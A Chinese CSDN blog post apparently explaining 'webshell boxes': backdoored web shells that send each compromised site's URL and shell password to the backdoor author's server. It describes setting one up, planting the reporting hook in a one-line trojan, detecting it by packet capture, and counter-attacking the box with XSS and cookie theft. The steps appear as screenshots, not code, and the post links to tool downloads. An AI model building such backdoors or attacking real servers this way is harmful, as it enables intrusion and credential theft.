webshell箱子系统的使用以及反后门

最新推荐文章于 2024-05-15 09:27:39 发布
最新推荐文章于 2024-05-15 09:27:39 发布
阅读量3k 收藏 17
点赞数 1
文章标签: xss 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/105151100
版权

Webshell箱子:相信很多人都使用过asp或者php的大马,一般这些大马的代码都是加密过的,这就存在一些猫腻了,因为在这些加密过的代码中有着后门代码,这些后门会将你找到的shell发送到他的服务器,就相当于你给别人打工。

废话不多说,实战来演示一下webshell箱子:
1、首先我们搭建一下asp服务器来放置webshell箱子(后门)
在这里插入图片描述
2、然后进入我们的后门网页,默认账号密码都是admin
在这里插入图片描述

3、随意构造一个一句话木马,然后再一句话木马代码里插入javascript语句来制作后门(调用webshell箱子里的api.asp文件)。
在这里插入图片描述
4、当你插入这个一句话木马在某个网页,它会发送这个网页的url以及一句话木马的密码到后门服务器
在这里插入图片描述
5、当我们使用一些大马时可以通过抓包来判断是否有后门
在这里插入图片描述

当我们找到后门服务器的地址后,可以通过插入XSS语句来反杀后门

利用burp抓到发送到后门服务器的包,将发送的参数修改成xss代码
在这里插入图片描述

然后去后门服务器地址看一下,出现弹窗
在这里插入图片描述

如果我们把这个xss代码改为获取cookie的代码,就可以把这个后台给拿下!后门作者以为你在第一层,其实你在第五层

工具下载链接
webshell箱子:链接:https://pan.baidu.com/s/1KEntKueCDJ_8dSpaGkrf1Q
提取码:g9hh

asp服务器搭建:链接:https://pan.baidu.com/s/1jAqHMLZEWwo1favLtjQVWA
提取码:avbu

要是喜欢渗透的带哥们可以来群1084999372互相交流

Henry404s
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
WEBSHELL箱子系统V1.0.rar
03-24
WEBSHELL箱子系统
Webshell后门查杀
12-20
Webshell后门查杀是网络安全领域中的一个重要环节,主要针对的是网站系统被恶意攻击者植入的WebshellWebshell是一种通过Web服务器漏洞植入的特殊脚本,它允许攻击者通过Web接口对目标服务器进行远程控制,执行任意...
php箱子,webshell箱子php版本.rar
weixin_33490603的博客
03-10 302
压缩包 : webshell箱子php版本.rar 列表api.phpconfig.phpindex.php安装说明.txtadmin/config.phpadmin/exit.phpadmin/help.phpadmin/index.phpadmin/login.phpadmin/root.phpadmin/shell.phpdata/1141056911#@!.datimages/0.gifi...
webshell箱子+xss后门+postman进入箱子后台
最新发布
qq_67694318的博客
05-15 364
webshell箱子如何利用木马XSS获取箱子后台
“黑吃黑”webshell箱子
向阳-Y.的博客
11-13 6371
目录“黑吃黑”webshell箱子环境准备马中马预防后门webshellbox “黑吃黑”webshell箱子 什么是webshell箱子?通俗一点的解释: 它可以让你在大马中植入后门,当别人用你植入过后门的大马去获取渗透别的网站时,你的webshellbox信封将会收到别人截获的密码! 环境准备 搭建一个asp的服务器,我们这里选用小旋风进行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.z
webshell箱子webshell箱子 搭建过程,使用方法,附带所需的下载链接
03-31 1702
人在做天在看,举头三尺有神明
WebShell箱子简介与原理
永远是少年
10-27 910
今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell箱子简介与原理。 一、WebShell箱子简介 二、WebShell箱子部署 三、WebShell箱子原理
基于python机器学习的分布式webshell检测系统.zip
03-05
基于python机器学习的分布式webshell检测系统.zip 基于python机器学习的分布式webshell检测系统.zip 基于python机器学习的分布式webshell检测系统.zip 基于python机器学习的分布式webshell检测系统.zip
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
WebShellWebshel​​l &&后门集合
02-05
WebShell的这是一个Webshel​​l开源项目类别ar Ascx 阿什克斯阿斯玛克斯天冬氨酸Aspx C Cfm Cgi Java脚本Jsp px 执照MySQL的Nginx的其他p l 自述文件SSH协议肥皂乌德普微信狗狗icmp 罐节点js 开火操作系统pwnginx ...
精品整理 asp,aspx后门(webshell)10个
12-15
精品收集整理各种websheel,没有后门,没有重复,是站长管理网站,清除木马的好助手
asp,aspx后门(webshell)10+个
11-24
前几天清理某企业服务器时检查出来的,各种后门没有重复的大家可以下载来研究一下
webshell箱子数据
11-12
webshell箱子数据,全部的密码都是1
WebShells:Webshel​​l漏洞注入列表
05-12
WebShells Webshel​​l漏洞注入列表。 #History这是PHP脚本后门的列表,允许攻击者破坏网站并获得对数据库和敏感目录的完整访问权,基本上是PHP Backdoor Web应用程序Trojan,它可以完全入侵任何网站并获得完整的数据库。 #仅用于教育目的。
WebShell后门检测与WebShell箱子
永远是少年
10-28 1012
今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell后门检测与WebShell箱子杀。 一、WebShell后门检测 二、WebShell后门原理 三、WebShell箱子
WEB漏洞-XSS跨站之订单及Shell箱子
xhscxj的博客
01-23 476
shell箱子 很多人在网上发布大马,他们在大马中写入了后门。当你成功把有后门的大马上传到目标网站上时,大马就会把该网站的url以及密码发送给在大马留过后门的人。 $_SERVER['HTTP_HOST']//获取当前的url $_SERVER['PHP_SELF']//获取当前访问的文件路径 例子:(留后门的方式有很多,也有可能加密,这里只是举一个例子) 因为代码<script src='http://www.xxx.com/index.php?url=$url&pass=$passwor
webshell后门分析
weixin_41489908的博客
03-13 409
别再让我遇到,不会有结果又很喜欢的人。。。 ​---- 网易云热评 一、访问上传的木马文件 http://192.168.1.104/1.asp 二、点击F12,打开谷歌自带的开发人员工具,点击network 三、输入密码,看看抓包情况,该木马会自动向某网站上传木马路径和密码 四、查看木马源文件,然后搜索该网址,随便修改为一个无效地址,该木马用的是转加密,所以我们搜索不到,有时候是其他加密,需要解密才可以修改 注意:抓包的时候,有的后门不是一登录就发送的...
ASP.NET木马及Webshell安全解决方案
YC.PENG的专栏
03-25 1203
  Security Fuard Solution Of ASP.NET and Webshell  文章简介:本文将为大家介绍在Microsoft Win系列的2003 SERVER IIS6.0中如何简单快速解决ASP.NET中的危险漏洞与隐患对WEB服务器系统安全威胁之详细防范设置步骤;读完本文,您将可以使您的网站服务器免去ASP.NET木马、Webshell所面对的提升权限、跨站攻击
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门
热门推荐
weixin_43263566的博客
01-25 1万+
Webshell(网页后门
webshell箱子
03-16
Webshell箱子是一种用于存储和管理Webshell的工具,它可以帮助安全研究人员和渗透测试人员更好地管理和利用WebshellWebshell是一种可以在Web服务器上执行命令的恶意脚本,攻击者可以利用Webshell来获取服务器的控制权,从而进行各种恶意活动。Webshell箱子可以帮助安全人员更好地了解和防御这种攻击。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值